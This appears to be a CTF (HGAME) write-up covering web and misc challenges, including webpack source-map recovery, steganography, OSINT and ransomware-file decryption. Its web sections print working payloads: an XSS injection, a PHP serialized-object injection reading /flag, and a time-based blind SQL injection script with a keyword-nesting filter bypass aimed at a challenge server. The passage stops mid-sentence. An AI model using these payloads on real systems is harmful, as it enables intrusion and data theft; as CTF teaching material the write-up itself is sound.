![在这里插入图片描述](https://img-blog.csdnimg.cn/404e585a28fd4dcab45a9b9d1b0e1be9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0d50f49918c4423ba3fd0bd64640e5f2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0d75aff0161d4ce2a16ce96999c6fb01.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
CVE-2021-40438
![在这里插入图片描述](https://img-blog.csdnimg.cn/767e8217221f4eb18c6fbddccd08a59e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/a125f7f94a504de38fcd89370779b7a5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
#### webpack-engine
![在这里插入图片描述](https://img-blog.csdnimg.cn/d08dc61535cb47e28128a22a037f92d5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_14,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/d30799dd073d46f8b175220567089b9f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- A detailed walkthrough of recovering source from webpack maps: https://www.freebuf.com/articles/web/276810.html

There is no need to reconstruct the map file here; just open the data URL directly:
data:application/json;base64,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
![在这里插入图片描述](https://img-blog.csdnimg.cn/ed8f962ae2534555ba118c4b11dfb486.png)
```python
>>> from base64 import *
>>> b64decode('YUdkaGJXVjdSREJ1ZEY5bU1ISTVaWFJmTWw5RGJFOXpNMTlUTUhWeVkyVmZiVUJ3ZlE9PQo=')
b'aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==\n'
>>> b64decode('aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==')
b'hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}'
```
#### At0m的留言板 (At0m's message board)
![在这里插入图片描述](https://img-blog.csdnimg.cn/4416788a1b024944af31f5df12662e19.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/de0e5589063d43a2a85d14dee3667815.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Just grab the element whose class name is content.
![在这里插入图片描述](https://img-blog.csdnimg.cn/7fafc07cc8b946d7aa3b70785e32d94b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
flag is declared with var, and a top-level var becomes a property of window, so listing every global variable of the current page reveals it (a top-level let or const would not show up this way).
![在这里插入图片描述](https://img-blog.csdnimg.cn/6285507105b84f3f9f35c4e02047c245.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/1b47b4783776461f81e510136669c128.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
That gives the value of flag. Next, trigger the XSS; a quick test shows the filtering is light, so this works directly:

```html
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=Object.keys(window)">
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/1f84200bcf6747478f1bef3632eb6835.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ebdb422bcb964a40abac662b1c660100.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
```html
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=F149_is_Here">
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/3e5c31a8043a4163b9846c49bce80847.png)
#### 一本单词书 (A vocabulary book)
![在这里插入图片描述](https://img-blog.csdnimg.cn/4ea2ced7776e48aea235f221d2daf255.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e9536c8819ad434092206466329965f3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Download the source. The login check is bypassed by getting around is_numeric(); plenty of bypasses are documented online.
![在这里插入图片描述](https://img-blog.csdnimg.cn/2e990950f6194e8eb5f46d8ef37691d4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
```
username=adm1n&password=1080%00
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/0fef5c51ba60465d8f5d7df68f92d5e8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Continuing with the source:
![在这里插入图片描述](https://img-blog.csdnimg.cn/0f86a76eea6d417cb981ca21abd48de8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
```json
{
    "name":"mochu7"
}
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/561795b8a2044e028fc2839037526035.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The value is serialized before being stored while the key name is kept as-is, with | separating the two.
Continuing with the source:
![在这里插入图片描述](https://img-blog.csdnimg.cn/aa879c5ff59f408b992af931ce3e8f7c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The important part is the decode function: it unserializes whatever follows the |. But if the key name itself contains a |, the split happens at that first |, and the remainder of the key name is what gets unserialized.
![在这里插入图片描述](https://img-blog.csdnimg.cn/018ab11b1315421886af0778e55a8a54.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
```php
<?php
class Evil {
    public $file='/flag';
}
$obj = new Evil();
var_dump(serialize($obj));
//O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
?>
```

Use that as the key name:

```
name|O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/e9c5e455cf804143833d10d40d57c01d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
#### Pokemon
![在这里插入图片描述](https://img-blog.csdnimg.cn/202a2e546fc04cb08563582d3c536827.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_16,color_FFFFFF,t_70,g_se,x_16)
error.php filters the code parameter:
![在这里插入图片描述](https://img-blog.csdnimg.cn/9bffdfec2fff453689467765a3862ed1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Fuzzing SQL keywords: every response of length 473 is one where the keyword was filtered.
![在这里插入图片描述](https://img-blog.csdnimg.cn/f2d10141d86747d48467d17752be3b07.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The filter simply replaces the keyword with an empty string, so it can be bypassed by double-writing (nesting) the word.
![在这里插入图片描述](https://img-blog.csdnimg.cn/14901c79b6f94cbcae70412981b2b45d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/084aec4965324c99869cd9ce4114f356.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9ecee77dbf544f11acdab8c247c253fc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
So time-based blind injection works, with each filtered word double-written.
```python
import string
import requests

# Characters to try at each position (the original literal contained an
# unescaped double quote; string.* gives the same set without that bug).
printable_str = string.digits + string.ascii_letters + string.punctuation
burp0_url = "http://121.43.141.153:60056/error.php?code="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                 "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
result = ""
# mid() is 1-indexed, so positions start at 1.
for i in range(1, 51):
    for s in printable_str:
        # Earlier stages of the same attack: database name, table names, column names.
        # payload = "if(ascii(mid(database(),{},1))like({}),sleep(1),1)".format(i, ord(s))
        # payload = "if(ascii(mid((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/(table_schema)like('pokemon')),{},1))like({}),sleep(1),0)".format(i, ord(s))
        # payload = "if(ascii(mid((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/(table_name)like('fllllllllaaaaaag')),{},1))like({}),sleep(1),0)".format(i, ord(s))
        payload = "if(ascii(mid((selselectect/*/**/*/flag/*/**/*/frfromom/*/**/*/pokemon.fllllllllaaaaaag),{},1))like({}),sleep(1),1)".format(i, ord(s))
        resp = requests.get(url=burp0_url + payload, headers=burp0_headers)
        # A delayed response means the guessed character is right.
        if resp.elapsed.seconds > 3:
            result += s
            print("[+]{}".format(result))
            break
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/9f81e0a668f4446e9b2ce81cafa28a84.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
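The double-write bypass rests on one property of the sanitizer: each keyword is removed in a single pass. The block below is an added example, not the challenge's server code or the author's script. It models that filter (the blacklist is reconstructed from the working payload above and is an assumption), shows why plain repetition fails while nesting succeeds, and turns a clean query into the obfuscated form used in the payload, including the `/*/**/*/` that the filter reduces to a `/**/` comment. A recursive filter defeats nesting, but it is still a blacklist; parameterised queries are the real fix.

```python
# Tokens the challenge strips (reconstructed from the working payload; the
# real list is not published) plus the whitespace forms it also removes.
FILTERED = ["select", "from", "where", "or", "and", "union", " ", "/**/"]


def single_pass_filter(s: str, blacklist=FILTERED) -> str:
    """Model of the server-side sanitizer: replace each token with '' exactly
    once, in order. This is what error.php appears to do."""
    for token in blacklist:
        s = s.replace(token, "")
    return s


def recursive_filter(s: str, blacklist=FILTERED) -> str:
    """The usual 'fix' people reach for: keep stripping until nothing changes.
    It defeats nesting, but remains a blacklist."""
    while True:
        stripped = single_pass_filter(s, blacklist)
        if stripped == s:
            return s
        s = stripped


def nest(token: str) -> str:
    """Double-write a token so removing the inner copy leaves the outer one:
    select -> selselectect, from -> frfromom, or -> oorr."""
    mid = len(token) // 2
    return token[:mid] + token + token[mid:]


def obfuscate(query: str, blacklist=FILTERED) -> str:
    """Turn a clean query into one that survives single_pass_filter.

    Keywords are nested wherever they occur, including inside identifiers such
    as information_schema, and spaces become /*/**/*/, which the filter
    collapses to the /**/ comment MySQL treats as whitespace.
    """
    words = [t for t in blacklist if t not in (" ", "/**/")]
    out = query
    for kw in sorted(words, key=len, reverse=True):  # longer keywords first
        out = out.replace(kw, nest(kw))
    return out.replace(" ", nest("/**/"))


if __name__ == "__main__":
    clean = "select flag from pokemon.fllllllllaaaaaag"
    payload = obfuscate(clean)
    print(payload)
    print(single_pass_filter(payload))    # the query the database really sees
    print(recursive_filter(payload))      # what a repeat-until-stable filter leaves
```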
### MISC

#### 一张怪怪的名片 (A strange business card)
![在这里插入图片描述](https://img-blog.csdnimg.cn/67a3ec6446594469a13cf1890c7c4369.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/7c9e5543977a488db966eb5c5afaab1d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Open it in Photoshop, select each block with the pen tool, stitch them together and raise the exposure to get:
![在这里插入图片描述](https://img-blog.csdnimg.cn/613b063a709d429ea1d8faec0ee2395e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
It doesn't scan directly; the center of the QR code looks like it was blacked out, which interferes. Try approximate recognition with a QR repair tool: https://merricx.github.io/qrazybox/
![在这里插入图片描述](https://img-blog.csdnimg.cn/e478daf0b6564f0d83dfb877a1cbafdd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/a807931b34cc4863b11f3fb398f7dbf8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/efcee0e847954cbfba08fdf77de9e187.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/80f09ecd1b2d4f188e138de2e699550a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/cfae302917d94cb3bf02eccae0716552.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
It looks like a link; use search-engine operators to track it down.
![在这里插入图片描述](https://img-blog.csdnimg.cn/9aea952c0cc644dcad17011bcad97841.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
That leads to the challenge author's GitHub, whose profile page links to their blog.
![在这里插入图片描述](https://img-blog.csdnimg.cn/be82e87b2c6741de868b671fb5af70a0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The blog's links page then leads to 鸿贵安.
![在这里插入图片描述](https://img-blog.csdnimg.cn/a442e4bb16f74af681c47221a0ad7d5c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
https://homeginan.homeboyc.cn
![在这里插入图片描述](https://img-blog.csdnimg.cn/0aa897afa13a4847a3f186a1f8046992.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8df46b9b372e410388738b865001abe8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCy7dxtsHqznOMkt6XEGKD8y5K5whenAcwuiT/Rue+snORVWAorXsB3ZGcITuFLEIThbx4/vh5E/Wk4R8qhNcFh5bwSSmwdULVuwBrJ5H3+kBOsYafEqP8RDX3sOdXTj80V8Puq+TNbXAMhxvdLGkkcBQ==
![在这里插入图片描述](https://img-blog.csdnimg.cn/c5ec705893f047418cbe3b6c1e18a417.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_15,color_FFFFFF,t_70,g_se,x_16)
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCylCR8cGp6MhxD4pTEACGutFVYCitewHdkZwhO4UsQhOFvHj++HkT9aThHyqE1wWHlvBJKbB1QtW7AGsnkff6QE+wqMT6fADfdpBQNOzg4DYA=
The passphrase for "Derive PBKDF2 key" has to be guessed from what the blog reveals.
![在这里插入图片描述](https://img-blog.csdnimg.cn/dfdd7f13aadd4a8baf57e59095d0fb2e.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/c53f7039dd2c4e478004cece1213472b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
So the birthday should be 20020816. That alone didn't work; after several more attempts the password turned out to be hgame20020816.
![在这里插入图片描述](https://img-blog.csdnimg.cn/4b9a1bbca94b4037a9eb47a7f58acda8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/dee8703e8e2143bdb510ac34a171e398.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{Wh0_4m_1?I_like_S0ciaI_En9in33ring}
#### 你上当了 我的很大 (Gotcha, mine is very big)
![在这里插入图片描述](https://img-blog.csdnimg.cn/d304a5d94b7b457aa89e73cdd96fbe7e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Step one is unpacking the nested archives, which a short Python script handles.
```python
import os
import zipfile


def decompress(files_list: list) -> list:
    """Extract every zip in files_list into the current directory and return
    the names of the files that came out, so the caller can recurse on them."""
    dec_files_list = []
    for file_name in files_list:
        if not zipfile.is_zipfile(file_name):
            continue
        with zipfile.ZipFile(file_name) as zf:
            zf.extractall(os.getcwd())
            dec_files_list += zf.namelist()
    return dec_files_list


if __name__ == '__main__':
    files_list = os.listdir()
    # Keep going until a round of extraction produces no new archives.
    while True:
        dec_files_list = decompress(files_list)
        if len(dec_files_list) == 0:
            break
        files_list = dec_files_list
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/6e775675add84cd5991609bc1ac30795.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Out come three classic videos; agfl.mp4 and lagf.mp4 each have a barcode at the end.
![在这里插入图片描述](https://img-blog.csdnimg.cn/18cd60b45fe248b391b2b9f5823abcd9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/96fe25663b8d4d3abc4abe207e37ae49.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Together with the two barcodes given in the hint:
![在这里插入图片描述](https://img-blog.csdnimg.cn/bbab27a00df64b0bbcc19880c7f973c5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/46c48ed1a766484eb8b546b8c97f9b3a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The two barcodes provided as image-host links decode with:
- https://zxing.org/w/decode.jspx

The other two needed a different barcode recognizer:
- https://products.aspose.app/barcode/recognize

That gives four base64-encoded image byte streams.
- https://the-x.cn/zh-cn/base64/ (base64 decoder that identifies the file type of the decoded data)
Stitch the four images together in Photoshop.
![在这里插入图片描述](https://img-blog.csdnimg.cn/5409e4a745fa42339958387ca10905f9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{Do_y0U_lIk3_MazE5?}
## Level - Week3

### MISC

#### 卡中毒 (Lagging and infected)
![在这里插入图片描述](https://img-blog.csdnimg.cn/75ebd2a89f454e9bb2c9fdc424c6fa0b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The browser history shows a 7z archive.
![在这里插入图片描述](https://img-blog.csdnimg.cn/945f64a7f37b46b7a3588d7268e6b0e4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Exporting and extracting it gives a file encrypted by the WannaRen ransomware.
![在这里插入图片描述](https://img-blog.csdnimg.cn/b7537f3d01c047e58a63cae3037bf97b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
One-click decryption with Huorong's WannaRen decryption tool: https://www.huorong.cn/info/1586440740454.html
![在这里插入图片描述](https://img-blog.csdnimg.cn/6e73484674224a26b55a168b0f5dff35.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
This gives text in the 新佛曰 (New Buddha Says) encoding:

新佛曰:諸隸僧降閦吽諸陀摩閦隸僧缽薩閦願耨願嘚願諦閦諸囉閦嘇劫嘇閦亦伏迦薩摩愍心薩摩降眾閦聞諸阿我閦嚩諸寂嘚咒咒莊閦我薩闍嚩劫閦嘇薩迦聞色須嘇聞我吽伏閦是般如閦

Decoder: http://hi.pcmoe.net/buddha.html
hgame{F1srt_STep_0f_MeM0rY_F0renS1cs}
#### 谁不喜欢猫猫呢 (Who doesn't like cats?)
![在这里插入图片描述](https://img-blog.csdnimg.cn/4d910b63a0fa44d084929ad8047cecc5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Every 10 pixels there is one pixel that stands out.
![在这里插入图片描述](https://img-blog.csdnimg.cn/6ccf7d4377d547068d497b49027b9c73.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
It looks like a thumbnail; stegsolve also shows information laid out very regularly. A short Python script extracts it:
```python
from PIL import Image

img = Image.open('1.png')
width, height = img.size
pixs_list = []
# The odd pixels sit on a grid: one every 11 pixels, starting at offset 5.
for w in range(5, width, 11):
    for h in range(5, height, 11):
        pix = img.getpixel((w, h))
        pixs_list.append(pix)
# Factor len(pixs_list) to get the width and height of the hidden image.
new_width, new_height = 215, 215
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
    for n_h in range(new_height):
        new_img.putpixel((n_w, n_h), pixs_list[idx])
        idx += 1
new_img.save('ok.png')
new_img.show()
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/11f1b3ed9c1b4fcda7259d116d39282b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
That gives:

st = 1
a = 9
b = 39

Not obvious yet what these mean. Some colored dots in the image stand out; analyzing them in Photoshop shows they are also regularly spaced, 4 pixels apart:
```python
from PIL import Image

img = Image.open('ok.png')
width, height = img.size
pixs_list = []
# Again a grid: one dot every 5 pixels, starting at offset 2.
for w in range(2, width, 5):
    for h in range(2, height, 5):
        pix = img.getpixel((w, h))
        pixs_list.append(pix)
# Factor len(pixs_list) to get the dimensions of the hidden image.
new_width, new_height = 43, 43
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
    for n_h in range(new_height):
        new_img.putpixel((n_w, n_h), pixs_list[idx])
        idx += 1
new_img.save('ok1.png')
new_img.show()
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/a9152a4e55af4dc0870da3c23c80df95.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Anyone who has seen the scrambled output of an Arnold transform (cat map) will recognise this. The a=9 and b=39 obtained earlier are the parameters of the Arnold matrix, and st=1 is the iteration count (period).
```python
from PIL import Image

img = Image.open('ok1.png')
if img.mode == "P":
    img = img.convert("RGB")
assert img.size[0] == img.size[1]   # the cat map is only defined on square images
dim = width, height = img.size
st = 1    # number of iterations
a = 9     # Arnold matrix parameters
b = 39
for _ in range(st):
    with Image.new(img.mode, dim) as canvas:
        for nx in range(img.size[0]):
            for ny in range(img.size[0]):
                # inverse Arnold map: undo the two shears modulo the image size
                y = (ny - nx * a) % width
                x = (nx - y * b) % height
                canvas.putpixel((y, x), img.getpixel((ny, nx)))
        img = canvas.copy()   # feed the result into the next iteration when st > 1
img.show()
img.save('ok2.png')
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/bc71d4cef9b44b12bd22096d915ca940.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
It looks a lot like a Piet program, so try running it with npiet
![在这里插入图片描述](https://img-blog.csdnimg.cn/fdecc9f85ca04b81a0572a27ab4c424d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The original image also has a zip appended as a trailing byte stream; carve it out and you get two lists. Following the hint, add the items pairwise.
```python
from binascii import unhexlify

list1 = [776686, 749573, 6395443, 2522866, 279584, 587965, 4012670, 1645156, 2184634]
list2 = [6065523, 6419830, 1421837, 5103682, 5963053, 2842996, 1113825, 1594064, 4578755]
flag = ''
for i in range(len(list1)):
    # each pairwise sum is the hex encoding of three flag characters
    flag += unhexlify(hex(list1[i] + list2[i])[2:]).decode()
print(flag)
```
hgame{wH@t_4_AM4Z1N9_1m4g3}
PS: getting the flag from this last step feels like it would allow quite a few unintended solutions.
WEB
SecurityCenter
![在这里插入图片描述](https://img-blog.csdnimg.cn/b3accadde3a947379d440014f3c170df.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_17,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0e10a4c3cae64c309663501c73fb1ed5.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9229b2c4641e492b952b592e019ac26c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
At first I thought it was SSRF and spent a long time on that; then, at the very bottom of the information provided by the hint, I found this
